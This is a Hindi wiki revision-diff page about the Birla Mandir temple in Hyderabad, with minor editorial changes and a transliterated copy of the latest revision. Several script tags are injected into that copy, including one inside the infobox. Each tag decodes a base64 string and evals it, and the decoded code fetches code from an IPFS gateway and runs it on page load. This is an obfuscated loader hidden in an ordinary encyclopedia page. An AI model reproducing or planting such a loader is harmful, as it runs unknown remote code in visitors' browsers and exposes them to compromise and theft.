Difference between revisions of "बिड़ला मंदिर हैदराबाद"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(One intermediate revision by one other user not shown)
Line 3: Line 3:
 
|चित्र=Birla-Mandir-Hyderabad.jpg
 
|चित्र=Birla-Mandir-Hyderabad.jpg
 
|चित्र का नाम=बिड़ला मंदिर, हैदराबाद
 
|चित्र का नाम=बिड़ला मंदिर, हैदराबाद
|वर्णन=[[काला पहाड़]] नामक [[पर्वत]] पर स्थित बिड़ला मंदिर का वातावरण शांतिमय है।  
+
|वर्णन=[[काला पहाड़]] नामक [[पर्वत]] पर स्थित बिड़ला मंदिर का वातावरण शांतिमय है।
 
|स्थान=[[हैदराबाद]]
 
|स्थान=[[हैदराबाद]]
 
|निर्माता=बिड़ला फाउंडेशन  
 
|निर्माता=बिड़ला फाउंडेशन  
Line 20: Line 20:
 
|अद्यतन= {{अद्यतन|13:43, 31 जनवरी 2012 (IST)}}
 
|अद्यतन= {{अद्यतन|13:43, 31 जनवरी 2012 (IST)}}
 
}}
 
}}
'''बिड़ला मंदिर''' [[आंध्र प्रदेश]] राज्य के [[हैदराबाद]] में स्थित भगवान वेंकटेश्वर को समर्पित एक ख़ूबसूरत मंदिर है।  
+
'''बिड़ला मंदिर''' [[आंध्र प्रदेश]] राज्य के [[हैदराबाद]] में स्थित है। यह भगवान वेंकटेश्वर को समर्पित एक ख़ूबसूरत मंदिर है।
*[[काला पहाड़]] नामक [[पर्वत]] पर स्थित बिड़ला मंदिर का वातावरण शांतिमय है।  
+
*[[काला पहाड़]] नामक [[पर्वत]] पर स्थित इस मंदिर का वातावरण शांतिमय है।  
*बिड़ला मंदिर बिड़ला फाउंडेशन द्वारा बनाया गया है।
+
*यह मंदिर बिड़ला फाउंडेशन द्वारा बनाया गया है।
*बिड़ला मंदिर का भीतरी गर्भगृह [[तिरुपति]] के [[तिरुपति वेंकटेश्वर मन्दिर|वेंकटेश्वर मंदिर]] का ही प्रतिरूप है।
+
*मंदिर का भीतरी गर्भगृह [[तिरुपति]] के [[तिरुपति वेंकटेश्वर मन्दिर|वेंकटेश्वर मंदिर]] का ही प्रतिरूप है।
*बिड़ला मंदिर का निर्माण [[राजस्थान]] से लाए गए संगमरमर से किया गया था।  
+
*[[राजस्थान]] से लाए गए संगमरमर पत्थरों से इस मंदिर का निर्माण किया गया था।  
 
*बिड़ला मंदिर [[उत्तर भारत|उत्तर]] और [[दक्षिण भारत]] के मंदिरों की वास्तुशैली को मिलाकर बनाया गया है।
 
*बिड़ला मंदिर [[उत्तर भारत|उत्तर]] और [[दक्षिण भारत]] के मंदिरों की वास्तुशैली को मिलाकर बनाया गया है।
*बिड़ला मंदिर का निचला हिस्सा दक्षिण भारतीय शैली और ऊपरी हिस्सा उत्तर भारतीय राजस्थानी शैली की कारीगरी में निर्मित है।
+
*हैदराबाद स्थित इस मंदिर का निचला हिस्सा दक्षिण भारतीय शैली में और ऊपरी हिस्सा उत्तर भारतीय राजस्थानी शैली की कारीगरी में निर्मित है।
*बिड़ला मंदिर के समीप ही बिड़ला तारामंडल भी है।  
+
*मंदिर के समीप ही बिड़ला तारामंडल भी है।
 
[[चित्र:Birla-Mandir-Hyderabad-.jpg|thumb|250px|left|बिड़ला मंदिर, [[हैदराबाद]]]]
 
[[चित्र:Birla-Mandir-Hyderabad-.jpg|thumb|250px|left|बिड़ला मंदिर, [[हैदराबाद]]]]
 +
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
Line 35: Line 36:
 
चित्र:Birla-Mandir-Hyderabad-1.jpg|बिड़ला मंदिर, [[हैदराबाद]]
 
चित्र:Birla-Mandir-Hyderabad-1.jpg|बिड़ला मंदिर, [[हैदराबाद]]
 
चित्र:Birla-Mandir-Hyderabad-2.jpg|बिड़ला मंदिर, [[हैदराबाद]]
 
चित्र:Birla-Mandir-Hyderabad-2.jpg|बिड़ला मंदिर, [[हैदराबाद]]
 +
चित्र:Birla-Mandir-Hyderabad-3.jpg|बिड़ला मंदिर, [[हैदराबाद]]
 
</gallery>
 
</gallery>
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
Line 40: Line 42:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{आंध्र प्रदेश के पर्यटन स्थल}}
 
{{आंध्र प्रदेश के पर्यटन स्थल}}
[[Category:हैदराबाद]]
+
[[Category:हैदराबाद]][[Category:आंध्र प्रदेश]][[Category:पर्यटन_कोश]][[Category:धार्मिक स्थल कोश]][[Category:हिन्दू धार्मिक स्थल]][[Category:हैदराबाद के पर्यटन स्थल]][[Category:आंध्र प्रदेश के पर्यटन स्थल]]
[[Category:आंध्र प्रदेश]]
 
[[Category:पर्यटन_कोश]]
 
[[Category:धार्मिक स्थल कोश]]
 
[[Category:हिन्दू धार्मिक स्थल]]
 
[[Category:हैदराबाद के पर्यटन स्थल]]
 
[[Category:आंध्र प्रदेश के पर्यटन स्थल]]
 
 
__INDEX__
 
__INDEX__
__NOTOC__
 

Latest revision as of 12:06, 4 August 2017

chitr:Disamb2.jpg bi dala mandir ek bahuvikalpi shabd hai any arthoan ke lie dekhean:- bi dala mandir

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bi dala mandir haidarabad
varnan kala paha d namak parvat par sthit bi dala mandir ka vatavaran shaantimay hai.
sthan haidarabad
nirmata bi dala phauandeshan
devi-devata veankateshvar
vastukala dakshin bharatiy shaili aur uttar bharatiy rajasthani shaili
bhaugolik sthiti uttar- 17.406°, poorv- 78.469°
manachitr liank googal manachitr
any janakari bi dala mandir ka bhitari garbhagrih tirupati ke veankateshvar mandir ka hi pratiroop hai.
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bi dala mandir aandhr pradesh rajy ke haidarabad mean sthit hai. yah bhagavan veankateshvar ko samarpit ek khoobasoorat mandir hai.

  • kala paha d namak parvat par sthit is mandir ka vatavaran shaantimay hai.
  • yah mandir bi dala phauandeshan dvara banaya gaya hai.
  • mandir ka bhitari garbhagrih tirupati ke veankateshvar mandir ka hi pratiroop hai.
  • rajasthan se lae ge sangamaramar pattharoan se is mandir ka nirman kiya gaya tha.
  • bi dala mandir uttar aur dakshin bharat ke mandiroan ki vastushaili ko milakar banaya gaya hai.
  • haidarabad sthit is mandir ka nichala hissa dakshin bharatiy shaili mean aur oopari hissa uttar bharatiy rajasthani shaili ki karigari mean nirmit hai.
  • mandir ke samip hi bi dala taramandal bhi hai.

[[chitr:Birla-Mandir-Hyderabad-.jpg|thumb|250px|left|bi dala mandir, haidarabad]]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

vithika

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>